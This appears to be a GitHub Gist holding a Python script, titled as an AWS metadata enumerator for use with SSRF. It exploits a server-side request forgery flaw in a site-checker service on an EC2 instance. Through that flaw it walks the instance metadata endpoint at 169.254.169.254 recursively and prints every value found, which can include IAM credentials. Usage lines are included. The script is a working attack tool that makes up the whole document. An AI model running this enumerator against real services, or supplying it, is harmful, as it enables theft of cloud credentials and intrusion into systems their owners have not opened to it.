Last active
April 10, 2021 19:30
-
-
Save hyakuhei/6e00c3006670620ca9ff93ee23d19f45 to your computer and use it in GitHub Desktop.
AWS Metadata Enumerator (for use with SSRF)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import json | |
| import base64 | |
| import sys | |
| # Scenario - Base addr is a website up/down checker, running on an ec2 instance | |
| # it takes a GET parameter of "addr" and returns two pieces of data: | |
| # base64 of the response text | |
| # status code | |
| # usage | |
| ## Walk from the root: $ python3 enumerate.py "" | |
| ## Walk a subtree : $ python3 enumerate.py "instance-action" | |
| base_addr = "http://169.254.169.254/latest/meta-data/" | |
| path = "<url>?addr=" | |
| def grok(url): | |
| x = requests.get(url) | |
| xj = json.loads(x.text) | |
| xj['SSRF_status'] = x.status_code | |
| if xj['status'] == 200: | |
| xj['plain'] = base64.b64decode(xj['page']).decode('ascii') | |
| if '\n' in xj['plain']: | |
| xj['values'] = xj['plain'].split('\n') | |
| else: | |
| xj['values'] = [xj['plain']] | |
| return xj | |
| def walk(base, v): | |
| ldata = grok(base + v) | |
| if ldata['status'] == 200 and ldata['SSRF_status'] == 200: | |
| for value in ldata['values']: | |
| if value.endswith('/'): | |
| walk(base+v, value) | |
| else: | |
| data = grok(base+v+value) | |
| if 'values' in data: | |
| print(f"{v}{value} = {data['values']}") | |
| else: | |
| print(f"{v}{value} = ERROR") | |
| if __name__ == "__main__": | |
| walk(path+base_addr, sys.argv[1]) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment